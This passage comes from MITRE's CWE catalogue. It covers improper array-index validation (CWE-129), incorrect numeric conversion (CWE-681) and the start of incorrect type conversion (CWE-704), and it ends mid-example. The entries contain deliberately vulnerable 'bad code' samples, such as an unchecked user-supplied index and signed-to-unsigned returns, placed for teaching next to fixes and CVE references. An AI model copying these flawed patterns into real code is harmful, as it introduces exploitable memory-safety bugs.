In this example the integer value used as the array index that is provided by the user may be outside the allowable range of indices for the array which may provide unexpected results or cause the application to fail. The integer value used for the array index should be validated to ensure that it is within the allowable range of indices for the array as in the following code.

(good code)

Example Language: Java

// Method called from servlet to obtain product information
public String displayProductSummary(int index) {

String productSummary = new String("");

try {

String productSummary = getProductSummary(index);

} catch (Exception ex) {...}

return productSummary;

}

public String getProductSummary(int index) {

String productSummary = "";

if ((index >= 0) && (index < MAX_PRODUCTS)) {

productSummary = products[index];

}
else {

System.err.println("index is out of bounds");
throw new IndexOutOfBoundsException();

}

return productSummary;

}

An alternative in Java would be to use one of the collection objects such as ArrayList that will automatically generate an exception if an attempt is made to access an array index that is out of bounds.

(good code)

Example Language: Java

ArrayList productArray = new ArrayList(MAX_PRODUCTS);
...
try {

productSummary = (String) productArray.get(index);

} catch (IndexOutOfBoundsException ex) {...}

Example 6

The following example asks a user for an offset into an array to select an item.

(bad code)

Example Language: C

int main (int argc, char **argv) {

char *items[] = {"boat", "car", "truck", "train"};
int index = GetUntrustedOffset();
printf("You selected %s\n", items[index-1]);

}

The programmer allows the user to specify which element in the list to select, however an attacker can provide an out-of-bounds offset, resulting in a buffer over-read (CWE-126).

Selected Observed Examples

Reference	Description
CVE-2005-0369	large ID in packet used as array index
CVE-2001-1009	negative array index as argument to POP LIST command
CVE-2003-0721	Integer signedness error leads to negative array index
CVE-2004-1189	product does not properly track a count and a maximum number, which can lead to resultant array index overflow.
CVE-2007-5756	Chain: device driver for packet-capturing software allows access to an unintended IOCTL with resultant array index error.
CVE-2005-2456	Chain: array index error (CWE-129) leads to deadlock (CWE-833)

Weakness Ordinalities

Ordinality

Description

Resultant

(where the weakness is typically related to the presence of some other weaknesses)

The most common condition situation leading to an out-of-bounds array index is the use of loop index variables as buffer indexes. If the end condition for the loop is subject to a flaw, the index can grow or shrink unbounded, therefore causing a buffer overflow or underflow. Another common situation leading to this condition is the use of a function's return value, or the resulting value of a calculation directly as an index in to a buffer.

Detection Methods

Method	Details
Automated Static Analysis	This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives. Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report array index errors that originate from command line arguments in a program that is not expected to run with setuid or other special privileges. Effectiveness: High Note:This is not a perfect solution, since 100% accuracy and coverage are not feasible.
Automated Dynamic Analysis	This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results.
Automated Dynamic Analysis	Use tools that are integrated during compilation to insert runtime error-checking mechanisms related to memory safety errors, such as AddressSanitizer (ASan) for C/C++ [REF-1518]. Effectiveness: Moderate Note:Crafted inputs are necessary to reach the code containing the error, such as generated by fuzzers. Also, these tools may reduce performance, and they only report the error condition - not the original mistake that led to the error.
Black Box	Black box methods might not get the needed code coverage within limited time constraints, and a dynamic test might not produce any noticeable side effects even if it is successful.

Functional Areas

Memory Management

Affected Resources

Memory

Memberships

Nature	Type	ID	Name
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	738	CERT C Secure Coding Standard (2008) Chapter 5 - Integers (INT)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	740	CERT C Secure Coding Standard (2008) Chapter 7 - Arrays (ARR)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	802	2010 Top 25 - Risky Resource Management
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	867	2011 Top 25 - Weaknesses On the Cusp
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	872	CERT C++ Secure Coding Section 04 - Integers (INT)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	874	CERT C++ Secure Coding Section 06 - Arrays and the STL (ARR)
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	884	CWE Cross-section
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	970	SFP Secondary Cluster: Faulty Buffer Access
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1131	CISQ Quality Measures (2016) - Security
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1160	SEI CERT C Coding Standard - Guidelines 06. Arrays (ARR)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1179	SEI CERT Perl Coding Standard - Guidelines 01. Input Validation and Data Sanitization (IDS)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1308	CISQ Quality Measures - Security
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1340	CISQ Data Protection Measures
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1399	Comprehensive Categorization: Memory Safety
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1440	OWASP Top Ten 2025 Category A05:2025 - Injection

Vulnerability Mapping Notes

Usage	ALLOWED (this CWE ID may be used to map to real-world vulnerabilities)
Reason	Acceptable-Use
Rationale	This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
Comments	Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.

Notes

Relationship

This weakness can precede uncontrolled memory allocation (CWE-789) in languages that automatically expand an array when an index is used that is larger than the size of the array, such as JavaScript.

Theoretical

An improperly validated array index might lead directly to the always-incorrect behavior of "access of array using out-of-bounds index."

Taxonomy Mappings

Mapped Taxonomy Name	Node ID	Fit	Mapped Node Name
CLASP			Unchecked array indexing
PLOVER			INDEX - Array index overflow
CERT C Secure Coding	ARR00-C		Understand how arrays work
CERT C Secure Coding	ARR30-C	CWE More Specific	Do not form or use out-of-bounds pointers or array subscripts
CERT C Secure Coding	ARR38-C		Do not add or subtract an integer to a pointer if the resulting value does not refer to a valid array element
CERT C Secure Coding	INT32-C		Ensure that operations on signed integers do not result in overflow
SEI CERT Perl Coding Standard	IDS32-PL	Imprecise	Validate any integer that is used as an array index
OMG ASCSM	ASCSM-CWE-129
Software Fault Patterns	SFP8		Faulty Buffer Access

Related Attack Patterns

CAPEC-ID	Attack Pattern Name
CAPEC-100	Overflow Buffers

References

[REF-7]	Michael Howard and David LeBlanc. "Writing Secure Code". Chapter 5, "Array Indexing Errors" Page 144. 2nd Edition. Microsoft Press. 2002-12-04. <https://www.microsoftpressstore.com/store/writing-secure-code-9780735617223>.
[REF-96]	Jason Lam. "Top 25 Series - Rank 14 - Improper Validation of Array Index". SANS Software Security Institute. 2010-03-12. <https://web.archive.org/web/20100316064026/http://blogs.sans.org/appsecstreetfighter/2010/03/12/top-25-series-rank-14-improper-validation-of-array-index/>. (URL validated: 2023-04-07)
[REF-58]	Michael Howard. "Address Space Layout Randomization in Windows Vista". <https://learn.microsoft.com/en-us/archive/blogs/michael_howard/address-space-layout-randomization-in-windows-vista>. (URL validated: 2023-04-07)
[REF-60]	"PaX". <https://en.wikipedia.org/wiki/Executable_space_protection#PaX>. (URL validated: 2023-04-07)
[REF-61]	Microsoft. "Understanding DEP as a mitigation technology part 1". <https://msrc.microsoft.com/blog/2009/06/understanding-dep-as-a-mitigation-technology-part-1/>. (URL validated: 2023-04-07)
[REF-76]	Sean Barnum and Michael Gegick. "Least Privilege". 2005-09-14. <https://web.archive.org/web/20211209014121/https://www.cisa.gov/uscert/bsi/articles/knowledge/principles/least-privilege>. (URL validated: 2023-04-07)
[REF-44]	Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 5: Buffer Overruns." Page 89. McGraw-Hill. 2010.
[REF-64]	Grant Murphy. "Position Independent Executables (PIE)". Red Hat. 2012-11-28. <https://www.redhat.com/en/blog/position-independent-executables-pie>. (URL validated: 2023-04-07)
[REF-962]	Object Management Group (OMG). "Automated Source Code Security Measure (ASCSM)". ASCSM-CWE-129. 2016-01. <http://www.omg.org/spec/ASCSM/1.0/>.
[REF-18]	Secure Software, Inc.. "The CLASP Application Security Process". 2005. <https://cwe.mitre.org/documents/sources/TheCLASPApplicationSecurityProcess.pdf>. (URL validated: 2024-11-17)
[REF-1332]	John Richard Moser. "Prelink and address space randomization". 2006-07-05. <https://lwn.net/Articles/190139/>. (URL validated: 2023-04-26)
[REF-1333]	Dmitry Evtyushkin, Dmitry Ponomarev, Nael Abu-Ghazaleh. "Jump Over ASLR: Attacking Branch Predictors to Bypass ASLR". 2016. <http://www.cs.ucr.edu/~nael/pubs/micro16.pdf>. (URL validated: 2023-04-26)
[REF-1335]	D3FEND. "Segment Address Offset Randomization (D3-SAOR)". 2023. <https://d3fend.mitre.org/technique/d3f:SegmentAddressOffsetRandomization/>. (URL validated: 2023-04-26)
[REF-1336]	D3FEND. "Process Segment Execution Prevention (D3-PSEP)". 2023. <https://d3fend.mitre.org/technique/d3f:ProcessSegmentExecutionPrevention/>. (URL validated: 2023-04-26)
[REF-1337]	Alexander Sotirov and Mark Dowd. "Bypassing Browser Memory Protections: Setting back browser security by 10 years". Memory information leaks. 2008. <https://www.blackhat.com/presentations/bh-usa-08/Sotirov_Dowd/bh08-sotirov-dowd.pdf>. (URL validated: 2023-04-26)
[REF-1518]	"AddressSanitizer". <https://clang.llvm.org/docs/AddressSanitizer.html>. (URL validated: 2025-12-10)

Content History

Submissions
Submission Date	Submitter	Organization
2006-07-19 (CWE Draft 3, 2006-07-19)	CLASP
2006-07-19 (CWE Draft 3, 2006-07-19)
Modifications
Modification Date	Modifier	Organization
2025-12-11 (CWE 4.19, 2025-12-11)	CWE Content Team	MITRE
2025-12-11 (CWE 4.19, 2025-12-11)	updated Detection_Factors, References, Relationships
2025-09-09 (CWE 4.18, 2025-09-09)	CWE Content Team	MITRE
2025-09-09 (CWE 4.18, 2025-09-09)	updated Demonstrative_Examples, Functional_Areas
2023-06-29	CWE Content Team	MITRE
2023-06-29	updated Mapping_Notes
2023-04-27	CWE Content Team	MITRE
2023-04-27	updated Potential_Mitigations, References, Relationships
2022-10-13	CWE Content Team	MITRE
2022-10-13	updated References, Relationships, Taxonomy_Mappings
2021-03-15	CWE Content Team	MITRE
2021-03-15	updated References, Relationships
2020-12-10	CWE Content Team	MITRE
2020-12-10	updated Relationships
2020-08-20	CWE Content Team	MITRE
2020-08-20	updated Potential_Mitigations, Relationships
2020-06-25	CWE Content Team	MITRE
2020-06-25	updated Demonstrative_Examples, Potential_Mitigations, Relationships, Type
2020-02-24	CWE Content Team	MITRE
2020-02-24	updated Potential_Mitigations, Relationships, Taxonomy_Mappings
2019-09-19	CWE Content Team	MITRE
2019-09-19	updated Potential_Mitigations
2019-01-03	CWE Content Team	MITRE
2019-01-03	updated References, Relationships, Taxonomy_Mappings
2018-03-27	CWE Content Team	MITRE
2018-03-27	updated References
2017-11-08	CWE Content Team	MITRE
2017-11-08	updated Causal_Nature, References, Relationships, Taxonomy_Mappings
2015-12-07	CWE Content Team	MITRE
2015-12-07	updated Relationships
2014-07-30	CWE Content Team	MITRE
2014-07-30	updated Relationships, Taxonomy_Mappings
2014-02-18	CWE Content Team	MITRE
2014-02-18	updated Potential_Mitigations, References
2012-10-30	CWE Content Team	MITRE
2012-10-30	updated Potential_Mitigations
2012-05-11	CWE Content Team	MITRE
2012-05-11	updated Demonstrative_Examples, Potential_Mitigations, References, Relationships
2011-09-13	CWE Content Team	MITRE
2011-09-13	updated Relationships, Taxonomy_Mappings
2011-06-27	CWE Content Team	MITRE
2011-06-27	updated Relationships
2011-06-01	CWE Content Team	MITRE
2011-06-01	updated Common_Consequences
2011-03-29	CWE Content Team	MITRE
2011-03-29	updated Common_Consequences, Demonstrative_Examples, Weakness_Ordinalities
2010-12-13	CWE Content Team	MITRE
2010-12-13	updated Demonstrative_Examples, Observed_Examples, Potential_Mitigations
2010-09-27	CWE Content Team	MITRE
2010-09-27	updated Potential_Mitigations, Relationship_Notes, Relationships
2010-06-21	CWE Content Team	MITRE
2010-06-21	updated Common_Consequences, Potential_Mitigations, References
2010-04-05	CWE Content Team	MITRE
2010-04-05	updated Related_Attack_Patterns
2010-02-16	CWE Content Team	MITRE
2010-02-16	updated Applicable_Platforms, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Potential_Mitigations, References, Related_Attack_Patterns, Relationships
2009-12-28	CWE Content Team	MITRE
2009-12-28	updated Applicable_Platforms, Common_Consequences, Observed_Examples, Other_Notes, Potential_Mitigations, Theoretical_Notes, Weakness_Ordinalities
2009-10-29	CWE Content Team	MITRE
2009-10-29	updated Description, Name, Relationships
2009-01-12	CWE Content Team	MITRE
2009-01-12	updated Common_Consequences
2008-11-24	CWE Content Team	MITRE
2008-11-24	updated Relationships, Taxonomy_Mappings
2008-09-08	CWE Content Team	MITRE
2008-09-08	updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities
2008-07-01	Sean Eidemiller	Cigital
2008-07-01	added/updated demonstrative examples
Previous Entry Names
Change Date	Previous Entry Name
2009-10-29	Unchecked Array Indexing

Weakness ID: 681

View customized information:

Description

Common Consequences

Impact	Details
Unexpected State; Quality Degradation	Scope: Other, Integrity The program could wind up using the wrong number and generate incorrect results. If the number is used to allocate resources or make a security decision, then this could introduce a vulnerability.

Potential Mitigations

Phase(s)	Mitigation
Implementation	Avoid making conversion between numeric types. Always check for the allowed ranges.

Relationships

Relevant to the view "Research Concepts" (View-1000)

Nature	Type	ID	Name
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	704	Incorrect Type Conversion or Cast
ParentOf	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	192	Integer Coercion Error
ParentOf	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	194	Unexpected Sign Extension
ParentOf	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	195	Signed to Unsigned Conversion Error
ParentOf	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	196	Unsigned to Signed Conversion Error
ParentOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	197	Numeric Truncation Error
CanPrecede	Pillar - a weakness that is the most abstract type of weakness and represents a theme for all class/base/variant weaknesses related to it. A Pillar is different from a Category as a Pillar is still technically a type of weakness that describes a mistake, while a Category represents a common characteristic used to group related things.	682	Incorrect Calculation

Relevant to the view "Software Development" (View-699)

Nature	Type	ID	Name
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	136	Type Errors
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	189	Numeric Errors

Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)

Nature	Type	ID	Name
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	704	Incorrect Type Conversion or Cast

Relevant to the view "CISQ Quality Measures (2020)" (View-1305)

Nature	Type	ID	Name
ParentOf	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	194	Unexpected Sign Extension
ParentOf	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	195	Signed to Unsigned Conversion Error
ParentOf	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	196	Unsigned to Signed Conversion Error
ParentOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	197	Numeric Truncation Error

Relevant to the view "CISQ Data Protection Measures" (View-1340)

Nature	Type	ID	Name
ParentOf	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	194	Unexpected Sign Extension
ParentOf	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	195	Signed to Unsigned Conversion Error
ParentOf	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	196	Unsigned to Signed Conversion Error
ParentOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	197	Numeric Truncation Error

Modes Of Introduction

Phase	Note
Implementation

Applicable Platforms

Languages	C (Undetermined Prevalence) Class: Not Language-Specific (Undetermined Prevalence)
Technologies	Class: Not Technology-Specific (Undetermined Prevalence)

Likelihood Of Exploit

High

Demonstrative Examples

Example 1

In the following Java example, a float literal is cast to an integer, thus causing a loss of precision.

(bad code)

Example Language: Java

int i = (int) 33457.8f;

Example 2

This code adds a float and an integer together, casting the result to an integer.

(bad code)

Example Language: PHP

$floatVal = 1.8345;
$intVal = 3;
$result = (int)$floatVal + $intVal;

Normally, PHP will preserve the precision of this operation, making $result = 4.8345. After the cast to int, it is reasonable to expect PHP to follow rounding convention and set $result = 5. However, the explicit cast to int always rounds DOWN, so the final value of $result is 4. This behavior may have unintended consequences.

Example 3

In this example the variable amount can hold a negative value when it is returned. Because the function is declared to return an unsigned int, amount will be implicitly converted to unsigned.

(bad code)

Example Language: C

unsigned int readdata () {

int amount = 0;
...
if (result == ERROR)
amount = -1;
...
return amount;

}

If the error condition in the code above is met, then the return value of readdata() will be 4,294,967,295 on a system that uses 32-bit integers.

Example 4

In this example, depending on the return value of accecssmainframe(), the variable amount can hold a negative value when it is returned. Because the function is declared to return an unsigned value, amount will be implicitly cast to an unsigned number.

(bad code)

Example Language: C

unsigned int readdata () {

int amount = 0;
...
amount = accessmainframe();
...
return amount;

}

If the return value of accessmainframe() is -1, then the return value of readdata() will be 4,294,967,295 on a system that uses 32-bit integers.

Selected Observed Examples

Reference	Description
CVE-2022-2639	Chain: integer coercion error (CWE-192) prevents a return value from indicating an error, leading to out-of-bounds write (CWE-787)
CVE-2021-43537	Chain: in a web browser, an unsigned 64-bit integer is forcibly cast to a 32-bit integer (CWE-681) and potentially leading to an integer overflow (CWE-190). If an integer overflow occurs, this can cause heap memory corruption (CWE-122)
CVE-2007-4268	Chain: integer signedness error (CWE-195) passes signed comparison, leading to heap overflow (CWE-122)
CVE-2007-4988	Chain: signed short width value in image processor is sign extended during conversion to unsigned int, which leads to integer overflow and heap-based buffer overflow.
CVE-2009-0231	Integer truncation of length value leads to heap-based buffer overflow.
CVE-2008-3282	Size of a particular type changes for 64-bit platforms, leading to an integer truncation in document processor causes incorrect index to be generated.

Weakness Ordinalities

Ordinality	Description
Primary	(where the weakness exists independent of other weaknesses)

Detection Methods

Method

Details

Automated Static Analysis

Effectiveness: High

Memberships

Nature	Type	ID	Name
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	738	CERT C Secure Coding Standard (2008) Chapter 5 - Integers (INT)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	739	CERT C Secure Coding Standard (2008) Chapter 6 - Floating Point (FLP)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	808	2010 Top 25 - Weaknesses On the Cusp
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	848	The CERT Oracle Secure Coding Standard for Java (2011) Chapter 5 - Numeric Types and Operations (NUM)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	867	2011 Top 25 - Weaknesses On the Cusp
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	872	CERT C++ Secure Coding Section 04 - Integers (INT)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	873	CERT C++ Secure Coding Section 05 - Floating Point Arithmetic (FLP)
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	884	CWE Cross-section
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	998	SFP Secondary Cluster: Glitch in Computation
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1131	CISQ Quality Measures (2016) - Security
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1137	SEI CERT Oracle Secure Coding Standard for Java - Guidelines 03. Numeric Types and Operations (NUM)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1158	SEI CERT C Coding Standard - Guidelines 04. Integers (INT)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1159	SEI CERT C Coding Standard - Guidelines 05. Floating Point (FLP)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1306	CISQ Quality Measures - Reliability
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1308	CISQ Quality Measures - Security
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1340	CISQ Data Protection Measures
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1416	Comprehensive Categorization: Resource Lifecycle Management

Vulnerability Mapping Notes

Usage	ALLOWED (this CWE ID may be used to map to real-world vulnerabilities)
Reason	Acceptable-Use
Rationale	This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
Comments	Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.

Taxonomy Mappings

Mapped Taxonomy Name	Node ID	Fit	Mapped Node Name
CERT C Secure Coding	FLP34-C	CWE More Abstract	Ensure that floating point conversions are within range of the new type
CERT C Secure Coding	INT15-C		Use intmax_t or uintmax_t for formatted IO on programmer-defined integer types
CERT C Secure Coding	INT31-C	CWE More Abstract	Ensure that integer conversions do not result in lost or misinterpreted data
CERT C Secure Coding	INT35-C		Evaluate integer expressions in a larger size before comparing or assigning to that size
The CERT Oracle Secure Coding Standard for Java (2011)	NUM12-J		Ensure conversions of numeric types to narrower types do not result in lost or misinterpreted data
Software Fault Patterns	SFP1		Glitch in computation
OMG ASCSM	ASCSM-CWE-681

References

[REF-962]

Object Management Group (OMG). "Automated Source Code Security Measure (ASCSM)". ASCSM-CWE-681. 2016-01.
<http://www.omg.org/spec/ASCSM/1.0/>.

Content History

Submissions
Submission Date	Submitter	Organization
2008-04-11 (CWE Draft 9, 2008-04-11)	CWE Community
2008-04-11 (CWE Draft 9, 2008-04-11)	Submitted by members of the CWE community to extend early CWE versions
Modifications
Modification Date	Modifier	Organization
2025-12-11 (CWE 4.19, 2025-12-11)	CWE Content Team	MITRE
2025-12-11 (CWE 4.19, 2025-12-11)	updated Applicable_Platforms, Detection_Factors, Weakness_Ordinalities
2025-04-03 (CWE 4.17, 2025-04-03)	CWE Content Team	MITRE
2025-04-03 (CWE 4.17, 2025-04-03)	updated Applicable_Platforms
2024-02-29 (CWE 4.14, 2024-02-29)	CWE Content Team	MITRE
2024-02-29 (CWE 4.14, 2024-02-29)	updated Observed_Examples
2023-10-26	CWE Content Team	MITRE
2023-10-26	updated Observed_Examples
2023-06-29	CWE Content Team	MITRE
2023-06-29	updated Mapping_Notes
2023-04-27	CWE Content Team	MITRE
2023-04-27	updated Relationships
2021-03-15	CWE Content Team	MITRE
2021-03-15	updated Relationships
2020-12-10	CWE Content Team	MITRE
2020-12-10	updated Relationships
2020-08-20	CWE Content Team	MITRE
2020-08-20	updated Relationships
2020-02-24	CWE Content Team	MITRE
2020-02-24	updated Relationships
2019-06-20	CWE Content Team	MITRE
2019-06-20	updated Relationships, Type
2019-01-03	CWE Content Team	MITRE
2019-01-03	updated References, Relationships, Taxonomy_Mappings
2017-11-08	CWE Content Team	MITRE
2017-11-08	updated Likelihood_of_Exploit, Observed_Examples, Taxonomy_Mappings, Type
2014-07-30	CWE Content Team	MITRE
2014-07-30	updated Relationships, Taxonomy_Mappings
2012-05-11	CWE Content Team	MITRE
2012-05-11	updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings
2011-09-13	CWE Content Team	MITRE
2011-09-13	updated Relationships, Taxonomy_Mappings
2011-06-27	CWE Content Team	MITRE
2011-06-27	updated Common_Consequences, Observed_Examples, Relationships
2011-06-01	CWE Content Team	MITRE
2011-06-01	updated Common_Consequences, Relationships, Taxonomy_Mappings
2011-03-29	CWE Content Team	MITRE
2011-03-29	updated Demonstrative_Examples
2010-02-16	CWE Content Team	MITRE
2010-02-16	updated Relationships
2009-12-28	CWE Content Team	MITRE
2009-12-28	updated Applicable_Platforms, Likelihood_of_Exploit, Potential_Mitigations
2008-11-24	CWE Content Team	MITRE
2008-11-24	updated Description, Relationships, Taxonomy_Mappings
2008-09-08	CWE Content Team	MITRE
2008-09-08	updated Relationships
2008-07-01	Eric Dalci	Cigital
2008-07-01	updated Potential_Mitigations, Time_of_Introduction
2008-07-01	Sean Eidemiller	Cigital
2008-07-01	added/updated demonstrative examples

Weakness ID: 704

Vulnerability Mapping: ALLOWED This CWE ID could be used to map to real-world vulnerabilities in limited situations requiring careful review (with careful review of mapping notes)
Abstraction: Class Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.

View customized information:

Description

The product does not correctly convert an object, resource, or structure from one type to a different type.

Common Consequences

Impact	Details
Other	Scope: Other

Relationships

Relevant to the view "Research Concepts" (View-1000)

Nature	Type	ID	Name
ChildOf	Pillar - a weakness that is the most abstract type of weakness and represents a theme for all class/base/variant weaknesses related to it. A Pillar is different from a Category as a Pillar is still technically a type of weakness that describes a mistake, while a Category represents a common characteristic used to group related things.	664	Improper Control of a Resource Through its Lifetime
ParentOf	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	588	Attempt to Access Child of a Non-structure Pointer
ParentOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	681	Incorrect Conversion between Numeric Types
ParentOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	843	Access of Resource Using Incompatible Type ('Type Confusion')
ParentOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	1389	Incorrect Parsing of Numbers with Different Radices

Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)

Nature	Type	ID	Name
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1003	Weaknesses for Simplified Mapping of Published Vulnerabilities
ParentOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	681	Incorrect Conversion between Numeric Types
ParentOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	843	Access of Resource Using Incompatible Type ('Type Confusion')

Modes Of Introduction

Phase	Note
Implementation

Applicable Platforms

Languages	C (Often Prevalent) C++ (Often Prevalent) Class: Not Language-Specific (Undetermined Prevalence) Class: Memory-Unsafe (Undetermined Prevalence)
Technologies	Class: Not Technology-Specific (Undetermined Prevalence)

Demonstrative Examples

Example 1

(bad code)

Example Language: C

unsigned int readdata () {

int amount = 0;
...
amount = accessmainframe();
...
return amount;

}

If the return value of accessmainframe() is -1, then the return value of readdata() will be 4,294,967,295 on a system that uses 32-bit integers.

Example 2

The following code uses a union to support the representation of different types of messages. It formats messages differently, depending on their type.

(bad code)

Example Language: C

#define NAME_TYPE 1
#define ID_TYPE 2

struct MessageBuffer
{

int msgType;
union {

char *name;
int nameID;

};

};

int main (int argc, char **argv) {

struct MessageBuffer buf;
char *defaultMessage = "Hello World";

buf.msgType = NAME_TYPE;
buf.name = defaultMessage;
